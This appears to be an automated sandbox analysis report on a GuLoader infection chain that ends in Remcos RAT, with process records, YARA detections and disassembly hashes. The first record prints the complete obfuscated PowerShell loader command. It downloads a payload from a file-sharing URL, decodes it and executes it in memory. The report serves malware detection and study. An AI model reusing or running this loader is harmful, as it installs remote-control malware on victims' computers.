                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207 (Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer) {Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc ArioUg.lmBrusb,efor.hapiCyaneKry s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)') ;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+ Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207 (Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207 (Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207 (Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,. islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207 (Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207 $Europamesterens;"
                                                                  Imagebase:0x1b0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2558798710.0000000008C10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2543351346.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2559922258.000000000A849000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:10:53:34
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:10:53:48
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                  Imagebase:0x180000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:10:54:05
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\msiexec.exe"
                                                                  Imagebase:0x180000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 00007FF848C4BF56 Relevance: .5, Instructions: 475COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 71324c3e49d122f0c0172aaa127baed73fad7ee7d998c07d8eb3b077d53941b9
                                                                    • Instruction ID: f1bc9c2e8688d1e4496b6cfa8e8a46be6a2d458682c17d45cffebcd1c1241ace
                                                                    • Opcode Fuzzy Hash: 71324c3e49d122f0c0172aaa127baed73fad7ee7d998c07d8eb3b077d53941b9
                                                                    • Instruction Fuzzy Hash: 04F1C33090CA8D8FEBA8EF28C8557E937D1FF54350F04426AE84DC72A5DF3498818B81
                                                                    Function 00007FF848C4CD02 Relevance: .5, Instructions: 460COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20da8e850dd75d21385c515bc8b51183b1605f2b5724f725f2bce87f3e67f29f
                                                                    • Instruction ID: 805876e9c02a1c8d8a92a6c54aea42244e9b6e7493099779ba4ac38756a4f472
                                                                    • Opcode Fuzzy Hash: 20da8e850dd75d21385c515bc8b51183b1605f2b5724f725f2bce87f3e67f29f
                                                                    • Instruction Fuzzy Hash: A7E1B33090CA4D8FEBA8EF28C8557E977D1FF54750F14426AD84DC7295DF38A9818B81
                                                                    Function 00007FF848EC0001 Relevance: 1.8, Strings: 1, Instructions: 502COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2429657151.00007FF848EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848ec0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @SH
                                                                    • API String ID: 0-2824597440
                                                                    • Opcode ID: 71dafd87bc5d644b64356b2d6cd9bbd6b68b222f6bdfc3ec394ee078ec48d944
                                                                    • Instruction ID: c5c3bc18e43fad0bb86a0c87d40b26674b377d67cc61b92a3b4763513ef5a419
                                                                    • Opcode Fuzzy Hash: 71dafd87bc5d644b64356b2d6cd9bbd6b68b222f6bdfc3ec394ee078ec48d944
                                                                    • Instruction Fuzzy Hash: CEF10332E0EA858FE79ABB2858552787BE1FF96650F1801FAC04DC71D3DF28AC458356
                                                                    Function 00007FF848D13FF9 Relevance: .8, Instructions: 832COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426721522.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 79dec0b7829f68eac99e0c7e734e8b7d627269c66a08b949452827a2cef20f4f
                                                                    • Instruction ID: edb38e0b669c752496a6568dce554de61e1c4b4da0afe574f5ffa35a0d08ac53
                                                                    • Opcode Fuzzy Hash: 79dec0b7829f68eac99e0c7e734e8b7d627269c66a08b949452827a2cef20f4f
                                                                    • Instruction Fuzzy Hash: 76424521D0FA8A4FF396AB2858156B97BE3EF56690F0801BED04DC71D3DF1898498356
                                                                    Function 00007FF848C4E1E5 Relevance: .7, Instructions: 681COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5bfab7614fea0033cf5ae9a21504ddd0ebbabefe07a95378478af4bb1cd958be
                                                                    • Instruction ID: e2fa0b990d217d3c5aff2aada0bbcb709b0e33cb6388bca35e788655b13bd5a6
                                                                    • Opcode Fuzzy Hash: 5bfab7614fea0033cf5ae9a21504ddd0ebbabefe07a95378478af4bb1cd958be
                                                                    • Instruction Fuzzy Hash: 48329E30A1CA4D8FDB89EF58C495AE9BBF1FF98750F100169E009D7296DB35E881CB85
                                                                    Function 00007FF848D16AB0 Relevance: .4, Instructions: 424COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426721522.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cbf980ece4fdf4bc873057bec78d68ee3359b15700bfa7e3f9aa4366064b780b
                                                                    • Instruction ID: ebb22c6c80fe5f2b8d633ec5e3f725f41f93ecf226769f13fea671d38340a70c
                                                                    • Opcode Fuzzy Hash: cbf980ece4fdf4bc873057bec78d68ee3359b15700bfa7e3f9aa4366064b780b
                                                                    • Instruction Fuzzy Hash: 2CC13231E0FA8A5FEB99BB2868556B97BE1EF15394F0801BAD00DC7193DB18AC09C355
                                                                    Function 00007FF848C4C916 Relevance: .3, Instructions: 334COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9280efa53e2b676bd84f14ca135e483f171a4ca8b8765bf75e19211a2dc08bc7
                                                                    • Instruction ID: b1c984790464c4b3e3816ee3b5fd31f741250470bd1f07fc897ec73f7baa76f1
                                                                    • Opcode Fuzzy Hash: 9280efa53e2b676bd84f14ca135e483f171a4ca8b8765bf75e19211a2dc08bc7
                                                                    • Instruction Fuzzy Hash: 99B1D63050CA8D8FDBA9EF28D8557E93BE1FF55350F04426AE84DC7292CB349985CB86
                                                                    Function 00007FF848D14184 Relevance: .1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426721522.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d257ae32736fbd53464f895d1a31f073d1e03b459753ac9215d28720f012c36a
                                                                    • Instruction ID: 5046af3890472b35b8ba6451edc8dc4d20ad7a84060748862a871e305b5703fb
                                                                    • Opcode Fuzzy Hash: d257ae32736fbd53464f895d1a31f073d1e03b459753ac9215d28720f012c36a
                                                                    • Instruction Fuzzy Hash: AA21F631E1FA4A4FF3D9AE2C145537566D3FF956A0F9801BAD00DC7193EE18AC898209
                                                                    Function 00007FF848C4C414 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 52f6849bf1d9b59887baaf5bff67ebf7c17d194c3dfbaac63a8dc4df049ffc73
                                                                    • Instruction ID: 4ba2b877b02bcbafc0c5f9f68a06eecbd7cc4e297730c0865fdcad288d5c3ef9
                                                                    • Opcode Fuzzy Hash: 52f6849bf1d9b59887baaf5bff67ebf7c17d194c3dfbaac63a8dc4df049ffc73
                                                                    • Instruction Fuzzy Hash: EA31D53091D64E8EFBF4EF15CD1ABF93290FB42B99F401239D84D860A2CB786985CB55
                                                                    Function 00007FF848D10F1F Relevance: .1, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426721522.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 17e735d0401e32bb1741e8a8e70436dad825784399b5f6bfbf0ac8970a81d192
                                                                    • Instruction ID: 5a5427c1e526d569217a668845b251c6c8fdd189364da090cfdc3489106cde51
                                                                    • Opcode Fuzzy Hash: 17e735d0401e32bb1741e8a8e70436dad825784399b5f6bfbf0ac8970a81d192
                                                                    • Instruction Fuzzy Hash: 2321D122E1F6D55FE395F63C285A2B86AE1EF5AA90F0844FED04DCB1D3CE184C498316
                                                                    Function 00007FF848C43535 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9ef4804f57fee93b02dd8bcd90f0bf0fbc29114ddd0783b9c72026b09af2c762
                                                                    • Instruction ID: a2cffd6589228435148380d94143afa431462d747f27e2ede83b4e2ac15b423b
                                                                    • Opcode Fuzzy Hash: 9ef4804f57fee93b02dd8bcd90f0bf0fbc29114ddd0783b9c72026b09af2c762
                                                                    • Instruction Fuzzy Hash: C001677111CB0C4FD788EF0CE451AA5B7E0FB95364F10056DE58AC3651DB36E881CB45
                                                                    Function 00007FF848D16D22 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426721522.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b1e23a82bac0a9a80f0090fe128488713e5a06af5e7e40ca67b66f34c15bdc8
                                                                    • Instruction ID: d0b35f8707d3c13df01f2c6ab4973c7da969cdc37472678819e71f75fb5fe8fa
                                                                    • Opcode Fuzzy Hash: 2b1e23a82bac0a9a80f0090fe128488713e5a06af5e7e40ca67b66f34c15bdc8
                                                                    • Instruction Fuzzy Hash: 66F0E232A0F6885FEB96E7ACA4892ECBBE0EF58260F1411BFC04DD3143DA2908458750

                                                                    Executed Functions

                                                                    Function 07826DBD Relevance: 10.3, Strings: 8, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$x.j$-j
                                                                    • API String ID: 0-3408791562
                                                                    • Opcode ID: 0cde788af28215c346eb58188c4e8c110b1a2c25dcd4e4e5b4002485cdd76389
                                                                    • Instruction ID: f5e7a52bfdb95d5ceaa5b7d0a2bb3c9e6c079cedb4185a3964261cd37bdad6ad
                                                                    • Opcode Fuzzy Hash: 0cde788af28215c346eb58188c4e8c110b1a2c25dcd4e4e5b4002485cdd76389
                                                                    • Instruction Fuzzy Hash: 28D181B4B002249FD714DB58C951B6EBBB2EF94304F108499D909AF395CB76ED82CFA1
                                                                    Function 078225D8 Relevance: 18.1, Strings: 14, Instructions: 594COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2835505118
                                                                    • Opcode ID: 5e10a2e6bf2a7da6b0032500d5a12ea6751cb28d7ac74de8bb84758e995a4e56
                                                                    • Instruction ID: eff7c08c38525e3d412ff227dd778a806d22fe5a894da3424f4aad77aa8e6ebf
                                                                    • Opcode Fuzzy Hash: 5e10a2e6bf2a7da6b0032500d5a12ea6751cb28d7ac74de8bb84758e995a4e56
                                                                    • Instruction Fuzzy Hash: 50127B71704226CFC7259F38C45066ABBF1FF95212F1684ABC845CB2A2DB35C883D7A1
                                                                    Function 07826328 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$x.j$-j
                                                                    • API String ID: 0-3408791562
                                                                    • Opcode ID: 48026c2b597d13d4c835b0456e47617b413b4984b27b24164be384492e5e9f1b
                                                                    • Instruction ID: 9ca764f3216d4a42764ffeb3e2b5450c7a5bfd8716190df049a129fb41d7dc77
                                                                    • Opcode Fuzzy Hash: 48026c2b597d13d4c835b0456e47617b413b4984b27b24164be384492e5e9f1b
                                                                    • Instruction Fuzzy Hash: D6D19DB4B012159FCB14DF68C551B6EBBB2EF94305F208869D901AF395CB76DC82CBA1
                                                                    Function 07827243 Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$x.j$x.j$-j
                                                                    • API String ID: 0-3844624119
                                                                    • Opcode ID: 814c54d34993102f8919f429e3e942f07d098bec23e5ac8a4d44739750ecd7d6
                                                                    • Instruction ID: 4d852f0b8a84b9bf0b60da5c43b5bbf8fa8eb93d88ed31f7fec80bdf0c666905
                                                                    • Opcode Fuzzy Hash: 814c54d34993102f8919f429e3e942f07d098bec23e5ac8a4d44739750ecd7d6
                                                                    • Instruction Fuzzy Hash: 57F18274B002249FD714DB68C951F6EBBB2EF94304F1084E5DA09AF395CB75AD828BA1
                                                                    Function 07826308 Relevance: 6.5, Strings: 5, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$x.j$-j
                                                                    • API String ID: 0-1948315676
                                                                    • Opcode ID: 4584655b9f0d0cd071cf5acb3055d14688a0f226e04bfa26077f0b1d273bf2c6
                                                                    • Instruction ID: 7ec40f05797af6de15711c0e212b715ce81c1b537080472e049f7d3b395478f9
                                                                    • Opcode Fuzzy Hash: 4584655b9f0d0cd071cf5acb3055d14688a0f226e04bfa26077f0b1d273bf2c6
                                                                    • Instruction Fuzzy Hash: 49B1BEB4B00215DFCB14CF58C551BAEBBB2EF98305F148459D801AF396DB36E886CBA1
                                                                    Function 07829D68 Relevance: 5.4, Strings: 4, Instructions: 444COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q
                                                                    • API String ID: 0-1785108022
                                                                    • Opcode ID: 8b6d3b1c432f3b01300478002d211acbcf1ccdef1ef689da9740f92c993823ce
                                                                    • Instruction ID: 71512bb5a64a6fb366135700a75a055c735cd67443f491d2675650d3beb0f972
                                                                    • Opcode Fuzzy Hash: 8b6d3b1c432f3b01300478002d211acbcf1ccdef1ef689da9740f92c993823ce
                                                                    • Instruction Fuzzy Hash: 77E14CB1B04366DFC7198F78881067ABBA29FA1215F14847AC905DF291DB35D883D7B2
                                                                    Function 07820E10 Relevance: 5.4, Strings: 4, Instructions: 426COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
